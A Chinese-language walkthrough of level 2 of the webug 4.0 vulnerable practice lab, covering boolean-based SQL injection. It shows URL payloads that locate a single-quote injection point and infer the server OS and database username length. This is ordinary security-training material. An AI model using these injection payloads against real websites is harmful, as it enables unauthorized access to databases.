webug 4.0 第二关 布尔注入

 

感谢webug团队一直以来的更新维护!

webug是什么

WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。

Webug官网:http://www.webug.org

Webug 4.0百度云地址: https://pan.baidu.com/s/1euUY4UG43BuOjhPqkJBvcw 提取码: 3xpy

来源:226安全团队

微信号:safeteam226

开始打靶

页面上一节我们已经观察过了,这次我们就直接开始思考,并且还是猜测sql为:

select * from table where id = $id+(后面可能有的限制语句或嵌套查询语句等等,因此我都习惯在注入语句后面跟注释符屏蔽这些可能的干扰)

标题说的是布尔注入,那么首先想到的就是使用and 1=2、and '1'='2等等来让页面产生变化,比如没有原来的某些数据(可以通过这里确定sql语句结果的显示位置,从而采用union方式)或者给一个报错的页面,从而让我们确定布尔注入点在哪。

接下来让我们依次尝试把。

假设$id为数字型:

url?id=1 and 1=2 %23,无反应

假设$id为字符型:

括号:url?id=1) and 1=2 %23,无反应

双引号:url?id=1" and 1=2 %23,无反应

单引号:url?id=1' and 1=2 %23,有反应了,没有数据了

webug 4.0 第二关 布尔注入_第1张图片

至此,我们就找到了布尔注入点,接下来就可以通过这个注入点获取我们的想要的信息。

比如操作系统名

url?id=1' and "Win32"=@@version_compile_os %23

比如用户名长度

url?id=1' and length(user())<15 %23

url?id=1' and length(user())=15 %23

url?id=1' and length(user())>15 %23

 

2019/5/17:增加查询Flag

这个太麻烦了,有毅力的读者请参照第一关的思路来弄吧,弄的时候需要注意flag值可能在其他表、其他库。

你可能感兴趣的:(webug,4.0)